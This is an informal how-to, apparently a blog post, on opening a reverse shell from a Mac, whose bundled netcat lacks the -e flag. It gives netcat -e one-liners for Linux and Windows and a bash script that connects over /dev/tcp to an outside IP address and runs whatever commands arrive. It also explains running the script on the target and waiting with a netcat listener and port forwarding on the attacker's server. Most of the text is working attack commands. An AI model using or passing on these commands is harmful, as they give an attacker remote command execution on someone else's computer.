On linux you might of heard of using netcat on the target, it would look something like this.
“nc 127.0.0.1 8080 -e /bin/bash”
Or on windows.
“nc 127.0.0.1 8080 -e cmd.exe”
However for unknown reasons (I assume security) apple’s modified version of netcat does not have a -e flag but there is a work around using bash. I do not take credit for this I just found it with a lucky google search.
On the target computer create a file called target.sh
the file should contain some bash code.
“#!/bin/bash
exec 5<>/dev/tcp/74.125.155.104/8080
cat <&5 | while read line; do $line 2>&5 >&5; done”
next open Terminal.app navigate to the directory the file is saved and type.
“chmod +x target.sh”
“./target.sh”
Before you do all this though you should have a open connection waiting on a server. Personally I just use an ubuntu box (you may need to install netcat on your server). From a shell on your server type
“netcat -l -p 8080 -vvv”
Here is an example below. The root@freakbox is obviously the server. I also forwarded the port 8080 to my server from my router.
